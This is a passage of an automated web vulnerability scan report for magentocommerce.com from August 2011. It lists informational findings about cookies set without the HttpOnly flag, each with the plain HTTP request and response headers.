<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.120. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.121. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.122. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.123. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.124. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.125. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.126. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.127. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.128. http://www.magentocommerce.com/products/checkout/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/checkout/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:50 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Content-Length: 23027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
4.129. http://www.magentocommerce.com/products/job-post.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/job-post.html HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:58 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 31391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
4.130. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.131. http://www.magentocommerce.com/roadmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Froadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:26 GMT
Content-Length: 87

<script>document.location = 'http://www.magentocommerce.com/product/features';</script>
4.132. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.133. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.134. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.135. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
